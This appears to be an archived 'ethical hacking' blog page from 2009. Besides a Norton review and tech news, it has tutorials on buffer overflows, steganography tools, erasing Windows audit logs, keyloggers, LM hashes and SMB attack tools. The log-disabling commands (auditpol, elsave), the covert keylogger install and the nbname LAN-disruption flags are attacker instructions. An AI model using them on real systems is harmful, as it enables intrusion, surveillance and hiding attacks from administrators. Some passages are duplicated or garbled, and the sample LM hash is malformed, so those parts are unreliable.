4/1/09 - 5/1/09 | Learn How To Hack! Learn Ethical Hacking & Download Free Hacking Tools

Showing newest 18 of 45 posts from 4/1/09 - 5/1/09. Show older posts

Thursday, April 30, 2009

Norton Antivirus 2009 – Norton Fails me..Again

Well..it all started with me picking up a Not For Sale copy of Norton Antivirus from an official source who wanted me to Norton Antivrus 2009 - well..what can i say :X test and rate the antivirus. Reluctant in the beginning (I had to take my Comodo firewall and Nod32 antivirus cover from my system to test this behemoth) , I agreed for the sake of proving myself wrong as my previous experience with it was terrible.

I was right..

Well lets start with the basics,I installed it,activated it online and there you go..It eats up system memory and rules like a beast. Silent operation is pesky however you can control the notification settings from the configurable options. I intentionally inserted an infected pendrive with a rather assorted collection of viruses,worms and Trojans (some made with love from various Virus development kits and Trojan makers like Turokjan and PRORAT) and it was able to detect most of them,however some hardened binded executables were not detected by it.
It includes facility of monitoring and scanning in realtime but doesn't includes anything special and distinctive from other antivirus products. Standard guard subsystems like mail scanning,file scanning,boot time scanning and reporting are there but are also available in cheaper and free antivirus products like Avast too.
Norton has made a name of itself for its antivirus and I now wonder how ? Perhaps there was a time when only they existed and people didn't really had any choice,but seriously,its time to switch over.
The updates are heavy as it tries to connect to central server and opens many ports in process. Norton Antivrus 2009 interface
I did that after my system slowed down tremendously and I was pesked with its notifications,I tried to uninstall it but here it too proved that I had to bite tougher nails. Uninstalling pesks with options and tries to stop you like he is the boss and you are not. NAV and live update features suffer from installshield errors sometimes and sometime a virus which has impenetrated into its defenses may corrupt a file or too,which will make it almost impossible (literally) to uninstall. Trust me,I m not a skeptic critic of Norton but they make me shudder every time I see NAV.
I was able to uninstall it after few registry edits and some messing with unlocker .

PROS -

Total Protection (?) in a comprehensive suite

CONS-

protection at the cost of resources
heavy updates
System hog
resource eater
file behemoth
uninstallation is tougher
Its NORTON
costlier then others

Aftermath-
I reverted to Nod32 and Comodo combo and My PC is almost as secure as Fort Knox :P and the best part is that they are the ones I shall recommended to you.

You can download it from here -

Download Norton Antirus 2009 TRIAL

(TRIAL ? well try before you buy which you are not gonna do it after you try it :P else you know where to get cracks :) )

Keep learning..

Technorati Tags: consumer,software downloads,security,softwares,norton 2009,reviews,rdhacker,prohack,software reviews,NAV 2009

Monday, April 27, 2009

Buffer overflows

A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string.

            #include              int main ( )             {              char name[31 ] ;              printf("Please type your name:  ");              gets(name) ;              printf("Hello, %s", name) ;              return 0;

Buffer overflow will occur if you enter:

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    AAAAAAAAAAAAAAAAAA

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity.

In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.

Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

Once a programmer has found a buffer overflow situation, then it is necessary to create a buffer of hex characters that represent assembled code instructions. The programmer then creates a C program that executes the target program, overflows the buffer by inserting the hex code to be executed.

Netmeeting 2.x exploit

(http://www.cultdeadcow.com/cDc_files/cDc-351/)
NT RAS Exploit

(http://www.cerberus-infosec.co.uk/wprasbuf.html)
IIS Hack

(http://www.eeye.com)
Oracle Web Exploit

(http://www.cerberus-infosec.co.uk/advowl.html)
Outlook Exploit

(http://www.ussrback.com/labs50.html)
IIS.printer

(http://www.securityfocus.com/bid/2674)

You may find details of a few known buffer overflow exploits at the URLs mentioned below:

Netmeeting 2.x exploit (http://www.cultdeadcow.com/cDc_files/cDc -351/)
NT RAS Exploit (http://www.cerberus-infosec.co.uk/wprasbuf.html)
IIS Hack (http://www.eeye.com)
Oracle Web Exploit (http://www.cerberus-infosec.co.uk/advowl.html)
Outlook Exploit (http://www.ussrback.com/labs50.html)
IIS .printer (http://www.securityfocus.com/bid/2674)

Buffer overflow vulnerabilities are inherent in code due to poor or no error checking.
General ways of protecting against buffer overflows:
1. Close the port of service
2. apply vendors patch or install the latest version of the software
3. Filter specific traffic at the firewall
4. Test key application
5. Run software at the least privilege required

General ways of protecting against buffer overflows include:

Close the port of service: Keep track of vulnerability reports from sources like CERT, bugtraq and take preventive measures such as blocking the port in question.
Apply vendors patch or install the latest version of the software: The next step should be to apply hotfix or patches from a reliable source.
Filter specific traffic at the firewall: All suspicious traffic should be routed at the perimeter itself.
Test key application: Key applications should be tested for boundary conditions before being put into production.
Run software at the least privilege required: No unnecessary privileges should be granted to users or applications. This is a best practice.

---Regards,
Amarjit Singh

What is Steganography?

The process of hiding data in images is called Steganography.
The most popular method for hiding data in files is to utilize graphic images as hiding place.
Attackers can embed information such as:
1. Source code for hacking tool
2. List of compromised servers
3. Plans for future attacks
4. your grandma/s secret cookie recipe

What is Steganography? It has been described as the art and science of hiding information by embedding messages within other seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.

Given below is a list of few steganography tools.

DiSi-Steganograph is a very small, DOS-based steganographic program that embeds data in PCX images.
EZStego is a Java based steganographic software which modifies the LSB of still pictures (supports only GIF and PICT formats) and rearranges the color palette.
Gif-It-Up v1.0 is a stego program for Windows 95 that hides data in GIF files. It replaces color indexes of the gif color table with indexes of 'color friends' (a color friend is a color in the same table and as close as possible).
Gifshuffle conceals a message in a GIF image by re-ordering the color map. Source code and a WIN32 executable are provided.
Hide and Seek is a stego program that hides any data into GIF images. It flips the LSB of pseudo-randomly chosen pixels. The data is first encrypted using the blowfish algorithm.
JPEG-JSTEG hides data inside a JPEG file. (Source code available)
MandelSteg and GIFExtract hide data in fractal GIF images. MandelSteg will create a Mandelbrot image (though it could be modified to produce other fractals), storing your data in the specified bit of the image pixels, after which GIFExtract can be used by the recipient to extract that bit-plane of the image. (Source code available)
MP3Stego hides data in popular MP3 sound files.
Nicetext transforms cipher-text into innocuous text which can be transformed back into the original cipher-text. The expandable set of tools allows experimentation with custom dictionaries, automatic simulation of writing style, and the use of Context-Free-Grammars to control text generation.
Pretty Good Envelope hides data in almost any file. In fact it embeds a binary message in a larger binary file by appending the message to the covert file as well as a 4-byte pointer to the start of the message. To retrieve the message, the last 4 bytes of the file are read, the file pointer is set to that value, and the file read from that point.
OutGuess is a steganographic tool for still images. It support the PNM and JPEG image formats. OutGuess 'preserves statistics based on frequency counts. As a result, no known statistical test is able to detect the presence of steganographic content'.
SecurEngine hides files into 24 bit bitmap images (JPEG or BMP) or even text files. Files can be encrypted using GOST, Vernam or '3-way'.
Stealth is a simple filter for PGP 2.x which strips of all identifying header information. Only the encrypted data (which looks like random noise) remains; thus it is suitable for steganographic use.
Snow is used to conceal messages in ASCII text by appending white spaces to the end of lines.
Steganography Tools 4 encrypts the data with IDEA, MPJ2, DES, 3DES and NSEA in CBC, ECB, CFB, OFB and PCBC modes and hides it inside graphics (by modifying the LSB of BMP files), digital audio (WAV files) or unused sectors of HD floppies. The embedded message is usually very small.
Steganos is an easy to use wizard style program to hide and/or encrypt files. Steganos encrypts files and hides them within various different types of files. It also includes a text editor using the soft-tempest technology. Many other security features are included.
Steghide features hiding data in BMP, WAV and AU files, blowfish encryption, MD5 hashing of pass phrases to blowfish keys and pseudo-random distribution of hidden bits in the cover-data.
Stegodos is a set of DOS programs that encodes messages into GIF or PCX images. It works only with 320x200x256 pictures. The data embedded by modifying the LSB of the picture is noticeable in most cases.
Stegonosaurus is a UNIX program that will convert any binary file into nonsense text, but which statistically resembles text in the language of the dictionary supplied.
StegonoWav is a Java (JDK 1.0) program that hides information in 16-bit wav files using a spread spectrum technique.
wbStego lets you hide data in bitmaps, text files and also HTML files. The data is encrypted before embedding. Two different user interfaces are proposed: 'the wizard' guides the user step by step and the 'pro' mode gives him full control.

Saturday, April 25, 2009

Protect your Pendrive and surfing using Democrakey

Hi friends.. what I m going to discuss here might be of your interest because almost everyone of us is pesked nowdays with viruses,in our pendrives/usb flash drives.Yep..this is the hard reality,you happily go to your friends home to take those legally downloaded movies (*ahem),software and more stuff and get back to your PC with your antivirus screaming “Caution!!! A virus has been detected”.
Virus in the pendrive..the same sad story..

Virus in the pendrive..the same sad story..

Well Its my story 2 weeks before when i was busy making a hacking challange and have to deal with quite a lot of pendrives,and the viruses. So I googled and found DemocraKey.Imagine carrying a portable security suite with you wherever you go. Walk up to any computer, quickly scan it for viruses, and then defeat any internet access blocks to view any website you want anonymously. It’s here, and with the DemocraKey 2.0 Lite let’s you have it on your iPod/pendrive/mp3 player.Yep..Its that small (just 50 MB in size) and packs some explosive applications for the stealthy geek.
DemocraKey is the brainchild of Kirk,who invented it in response to government snooping and censorship in China and the United States.DemocraKey converts your portable drive into a start menu like gui enabled mini drive which will track stats of how much space is left in your portable drive and you can directly launch applications from the menu. Yep..Your Pendrive will have a menu like this

Yep..Your Pendrive will have a menu like this

DemocraKey features Clamwin as an antivirus suite,Mozilla Thunderbird as an Email client and an enhanced version of Mozilla Firefox with TOR proxy enabled so that you can connect to any network or surf any site in the world,anywhere..anytime.The best part of it is that its free and its Open source backed up by GNU/GPL license.based upon portable applications,you can enhance the DemocraKey experience by adding applications from portableapps.com.
In a nutshell,DemocraKey is your saviour when it comes to pendrive security and surfing net anonymously.
Lemme sum up features of DemocraKey -

Protect your computer from viruses with a security enhanced version of Firefox
Visit sites that are blocked by your school/employer/government
Hide your internet actions with Tor
Encrypt personal emails with GPG
Scan your computer with portable built in Antivirus software
Runs from any portable media - iPod, USB key, Digital Camera…
It’s FREE and Open Source!

You can download DemocraKey from -
Download from Sourceforge

I hope you like it :)

POSTED BY XERO . ALL RIGHTS RESERVED.

Technorati Tags: downloads,software downloads,security,what is?,proxy,rdhacker,prohack,pendrive,usb,flash drive,democrakey

Friday, April 24, 2009

Google gets Powerpoint Powered and TIFF enabled

Google has been sprucing up its services (like it always does) and has added the support for viewing PowerPoint files Google Powered powerpoint :P

(.ppt) and TIFF files (compressed image files) to its services,enabled in Google apps. A few months ago, it had added the support for viewing PDFs files in your browser,the same viewer now supports the TIFF and Microsoft PowerPoint document formats too.Now you can view TIFF and PPT files online ,directly in your browser,without needing hefty software packages to start things up.
The default Google viewer earlier had "View as slideshow" option for PowerPoint files for a while; but now they have integrated the conversion technology into the same viewer that they used for PDFs and TIFFs. Google 's Viewer now showcases Powerpoint and TIFF files too

Google 's Viewer now showcases Powerpoint and TIFF files too

Powered up with a richer set of features,the new viewer enables you to zoom in and out, select text to copy and paste, and "print" the presentation to a PDF document. And, unlike the old version, you no longer require to have a Flash plugin installed on your browser.
Stay tuned for more Google innovations..
Keep Reading..
POSTED BY XERO . SOURCE .ALL RIGHTS RESERVED .

Technorati Tags: Google,Microsoft,technology News,Internet tips and tricks,pdf files,powerpoint

Thursday, April 23, 2009

Covering Tracks

Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.

When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

Erasing evidence of a compromise is requirement for any attacker who would like to remain obscure. This usually starts with erasing the contaminated logins and any possible error messages that may have been generated from the attack process. For example, a buffer overflow attack will usually leave a message in the system logs. Next, the attention is turned to effecting changes so that future logins are not logged. A good way of ensuring that the system administrator continues to believe the output of his system is to manipulate the event logs and tweak the audit system.

Because the first thing a system administrator does to monitor unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the system logs. In some extreme cases, rootkits can disable logging all together and discard all existing logs. This happens if the intruders intend to use the system for a longer time as a launch base for future intrusion activity. Then they will only remove those portions of logs that can reveal their presence.

Disabling Auditing

First thing intruders will do after gaining Administrator privileges is to disable auditing.
NT Resource Kit's auditpol.exe tool can disable auditing using command line.
At the end of their stay, the intruders will just turn on auditing again using auditpol.exe

One of the first steps for an attacker who has command-line capabilities is to determine the auditing status of the target system, locate sensitive files (such as password files), implant automatic information gathering tools (such as a Keyboard Logger or Network Sniffer).

Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.

auditpol.exe is a part of the NT resource kit and can be used as a simple command line utility to find out the audit status of the target system and also to make changes to it.

The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

C:\> auditpol \\

This will reveal the current audit status of the system. He can choose to disable the auditing by:

C :\> auditpol \\ /disable

This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

There is no effective technique to lock the auditing to prevent auditpol from disabling it. However, one can make it a scheduled event which will make the system check for the status of the auditing and then turns it on if it is disabled. Most host based IDS products will automatically re-enable auditing if it has been turned off.

There are a number of reasons why auditing is important. These include:

Successful attacks often preceded by a series of unsuccessful ones.
Detecting an attack in its early phase can contain damage.
Recovery often depends on realistic damage assessment.
Auditing and intrusion detection helps determine causal factors/people for the attack.
Assessing network compromise is dependant on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

Intruders can easily wipe out the logs in the event viewer
Event viewer on the attackers host can open, read and clear logs of the remote host.
This process will clear logs of all records but will leave one record stating that the event log has been cleared by 'Attacker'

The event-logging service controls whether events are tracked on Windows 2000 systems. When this service is started, user actions and system resource usage events with the following event logs can be tracked:

Application Log Records events logged by applications.
Directory Service Records events logged by Active Directory and its related services.
DNS Server Records DNS queries, responses, and other DNS activities.
File Replication Service Records file replication activities on the system.
Security Log Records events set for auditing with local or global group policies.
System Log Records events logged by the operating system or its components, such as the failure of a service to start at bootup.

In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared.

Dump Event Log is a command-line tool, included in the Windows 2000 Server Resource Kit. It will dump an event log for a local or remote system into a tab separated text file. This file can then be imported into a spreadsheet or database for further investigation. The tool can also be used to filter for or filter out certain event types.

The following syntax is used by the dumpel.exe tool:

dumpel -f file [-s \\server] [-1 log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x] Where:

-f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

-s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

-1 log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

-m source. Specifies in which source (such as redirector (rdr), serial, and so on) to dump records. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

-e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

-r. Specifies whether to filter for specific sources or records, or to filter them out.

-t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

-d x. Dumps events for the past x days.

An attacker would be interested in clearing the event log after the audit has been disabled using auditpol.exe. One tool that will be of interest is elsave.exe Written by Jesper Lauritsen, this tool helps clear NT event log.

ELSave takes the following arguments:

*-s \\server*	Server for which you want to save or clear the log.
-F file	Save the log to a file with this name. Must be an absolute path to a local file on the server specified with -s. If -F is not specified the log is not saved.
-l log	Name of log to save or clear. Must be one of system, application or security. Default is application.
-q	Write errors and warnings to the application event log. Default is to write errors to stderr. This option is mostly useful when ELSave is run in the background, like for example from the scheduler.
-C	Clears the log. If -C is not specified the log is not cleared.

Example:

Save the application log on \\serv1 to \\serv1\d$\application.log:

elsave -s \ \serv1 -F d: \application.log

Save the system log on the local machine to d: \system.log and then clear the log:

elsave -l system -F d: \system.log -C

Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.
To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear.
To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!

It is considered that event logs are generally not compromised without shutting the service down by legitimate means or otherwise. WinZapper is a tool that is capable of breaking into the event logging system without shutting it off or crashing the service.

Evidence Eliminator is an easy to use powerful and flexible data cleansing system for Windows PC.
Daily use protects you from unwanted data becoming permanently hidden in your PC.
It cleans recycle bins, Internet cache, system files, temp folders etc.

Evidence Eliminator is a windows based product that is known for countering privacy invasion and giving the user the ability to remove evidence of his activities on a system - such as websites visited, cookies stored, documents read etc.

There are two ways of hiding files in NT/2000.
1. Attrib
  - use attrib +h [file/directory]
2. NTFS Alternate Data Streaming
  - NTFS files system used by Windows NT, 2000 and XP has a feature Alternate Data Streams - allow data to be stored in hidden files that are linked to a normal visible file.
Streams are not limited in size and there can be more than one stream linked to a normal file.

Every file consists of a set of attributes. However, a file's name is not part of the file. The filename is a directory entry that points to the actual file. This level of indirection is necessary because Windows 2000 and Windows NT both support links. The directory entry can be considered to be analogous to a pointer - the unique filename and directory entry tells the file system which file to access. It is possible to have more than one pointer that points to the same data.

---Regards,
Amarjit Singh

Keystroke Loggers: KEYLOGGERS

If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.
Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.
There are two types of keystroke loggers:
1. Software based and
2. Hardware based.

Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed using the keyboard and making it available to another person / agency probing the user. This may be conveyed over e-mail or a Web site or even saved on the same system as a hidden file.

Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

Hardware keystroke loggers are hardware devices that attach physically to the keyboard and records data. These devices generally look like a standard keyboard adapter, so that they remain camouflaged unless specifically looked for. In order to retrieve data from a hardware logger, the person who is doing the probing must regain physical access to that piece of equipment. Hardware loggers work by storing information in the actual device, and generally do not have the ability to broadcast or send such information out over a network. One primary advantage hardware keystroke loggers carry is that they will not be discovered by any of the anti-spyware, anti-virus or desktop security programs.

Software keystroke loggers are more widely used as they can be installed remotely via the network, as part of virus / Trojan software etc. Physical access is not required on part of the person probing to obtain keystroke data (as data is emailed out from the machine periodically). Software loggers often have the ability to obtain much more data as well, as they are not limited by physical memory allocations in the same way as hardware keystroke loggers are. Magic Lantern - developed as part of the FBI's Carnivore project - is a Trojan/key-logger specifically aimed at gathering encryption key information for transmission back to the FBI.

Spector is a spy ware and it will record everything anyone does on the internet.
Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.
Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
eBlaster records their emails, chats, instant messages, websites visited and key strokes typed and then automatically sends this recorded information toy our own email address.
Within seconds of them sending or receiving an email, you will receive your own copy of that email.

IKS Software Keylogger

IKS - Invisible Keylogger is a desktop activity logger that is powered by a kernel mode driver. This driver enables it to run silently at the lowest level of windows 2000/XP operating systems. IKS is extremely difficult to detect, primarily because of its stealth surveillance methods. The only evidence of IKS is the growing binary keystroke log file with the input of keystrokes. All keystrokes are recorded, including the path alt-ctrl-del and keystrokes in a DOS box or Java chat room.

In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable . For manual setup, an attacker needs to copy just one program file to the target computer and add two lines in system.ini file. He can then rename the log file, or even rename the program. Therefore, even an exhaustive hard drive search will find that the program exists

IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

Recorded keystrokes can be played back into any text editor using proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders, KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.

What is LanManager Hash?

Example: Lets say your password is: '123456qwerty'

When this password is encrypted with LM algorithm, it is first converted to all uppercase: '123456QWERTY'
The password is padded with null (blank) characters to make it 14 character length: '123456QWERTY_'
Before encrypting this password, 14 character string is split into half: '123456Q and WERTY_'
Each string is individually encrypted and the results concatenated.
'123456Q' = 6BF11E04AFAB197F

'WERTY_' = F1E9FFDCC75575B15
The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

The first half of the hash contains alpha-numeric characters and it will take 24 hrs to crack by LOphtcrack and second half only takes 60 seconds.

All Windows clients including Windows 2000, Windows Server 2003, and Windows XP are configured by default to send LM and NTLM authentication responses, except Win9x clients, which only send LM. The default setting on servers allows all clients to authenticate with servers and use their resources. However, this default setting allows for LM responses (the weakest form of authentication response) to be sent over the network. This makes it attractive to attackers who can sniff the traffic and crack passwords with relatively less effort.

Microsoft Windows NT stores two types of passwords: A LAN Manager (LM) password and a Windows NT password. We have seen in our discussion in module four how the domain controller gives out an eight byte challenge and the twenty four byte challenge response the client (server or workstation) replies with. These hashes are transmitted without encryption over the network. If the domain controller authenticates the challenge response, it replies with an NT session key and a LAN Manager (LM) session key. These session keys are encrypted between the client and the Domain Controller.

Let us now take a look at the LAN Manager hash. LAN Manager uses a fourteen byte password. If the password is less than fourteen bytes, it is concatenated with zeros. After conversion into upper case, it is split into seven byte halves. From each seven byte half an eight byte odd parity DES key is constructed. Each eight byte DES key is encrypted with a "magic number". The results of the magic number encryption are concatenated into a sixteen byte one way hash value. This value is the LAN Manager one-way hash of the password.

It is easy for password crackers to detect if there is an eighth character when the LM password is used. The challenge response can then be brute-forced for the LM-hash. The number of possible combinations in the LM password is relatively low compared to the Windows NT password.

While encryption forms such as Kerberos are considered as effective countermeasure, the Windows 9x and Windows NT operating systems cannot use the Kerberos version 5 protocol for authentication. Therefore in Windows Server 2003 also, these systems authenticate by default with both the LM and NTLM protocols for network authentication. What is possible though is for Windows 9x and Windows NT to use a more secure authentication protocol such as NTLMv2. For the logon process, NTLMv2 uses a secure channel to protect the authentication process. Therefore these systems have to set LAN Manager Authentication Level to "Send NTLMv2 responses only".

---Regards,

Amarjit Singh

Wednesday, April 22, 2009

Nokia 1100 handsets maybe vulnerable to hacking

Incidents of Nokia 1100 handsets being in demand for a price which is as high as $33,000 in some cases and the subsequent investigations by agencies have revealed that the model has login details of transactions carried out through it and therefore can be misused by hackers.

This was revealed by Netherlands-based Ultrascan Advanced Global Investigations which was roped in by the police to investigate why people were ready to pay so much for an old version of handset.

Handsets manufactured at Nokia’s Bochum, Germany are reported to be prone to such hacking and not the entire range.

Source: http://www.telecomtiger.com

---Regards,
Amarjit Singh

Computers Worldwide Hit By Cyber Hackers

A small group of cyber criminals have succeeded in hacking into almost two million computers around the world - including British Government machines.

The global network of 1.9m computers, infected with malicious software, or malware, was tracked to a cyber gang of six people based in the Ukraine.

The malware was remotely controlled by the gang, allowing them to read emails, copy files, record keystrokes, send spam and make screenshots, security firm Finjan said.

The criminal network of remotely controlled computers, known as a botnet, was the largest ever discovered, Finjan said - its server has now been shut down.

The botnet started operating in February, infecting consumer, corporate, and government machines.

By far the highest number of infected machines was found in the US, with 45% of the total while the UK's 115,000 affected machines accounted for 6% of the total.

The sophistication of the malware and the staggering amount of infected computers proves that cyber gangs are raising the bar - Yuval Ben-Itzhak, Finjan's chief technology officer

The malware infects computers running the Windows XP operating system using vulnerabilities in web browsers such as Internet Explorer and Firefox.

It installs itself on computers when a legitimate but compromised website is visited; computer users do not have to click on a specific link or download any programmes for the malware to take affect.

"As predicted at the end of last year, cyber criminals keep on looking for improved methods to distribute their malware and Trojans are winning the race," said Yuval Ben-Itzhak, Finjan's chief technology officer.

"The sophistication of the malware and the staggering amount of infected computers proves that cyber gangs are raising the bar."

The gang members, who have not been caught, were selling access to the compromised machines on a hackers' forum in Russia, auctioning access to 1,000 computers at a time for around £75 a day.

Mr Ben-Itzhak said key loggers could also be used to obtain credit card details for the gang's own use or to be sold on.

A spokesman for the Cabinet Office, which sets standards for the use of information technology across Government, said he could not give details of the departments involved while police said they were aware of the botnet and taking "appropriate action".

Source: http://news.sky.com

---Regards,
Amarjit Singh

SMB Hacking Tools

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

One way of increasing the speed of LOphtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Therefore password cracking becomes a time-consuming laborious process unless it is targeted towards particular passwords.

If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.

SMBGrind is a tool that seeks to solve this problem and make password cracking by LOphtCrack faster. It removes duplicates and saves the file to disk so that the attacker can e-mail the filtered file directly from within SMB Grinder via the File-Send menu option.

Hacking Tool: SMBDie

SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request

SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.

An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

Any machine on the network including systems that are connected via VPN can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LAN man server service can be stopped which prevents the attack, but again may not be suitable on a file and print sharing server.

NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.
NBT deputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.
This tool works well with SMBRelay.
For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBT Deputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"

There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it.
This will block the client from participating in the NetBIOS network.
Tool: nbname
- NBName can disable entire LANs and prevent machines from rejoining them.
- Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.

For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.

NBName is a tool written by Sir Dystic of the Cult of Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.

Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.

---Regards,
Amarjit Singh

Tuesday, April 21, 2009

SMBRelay Weakness & Countermeasures

The problem is to convince a victim's client to authenticate to the MITM server
You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.
Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures
Configure Windows 2000 to use SMB signing.
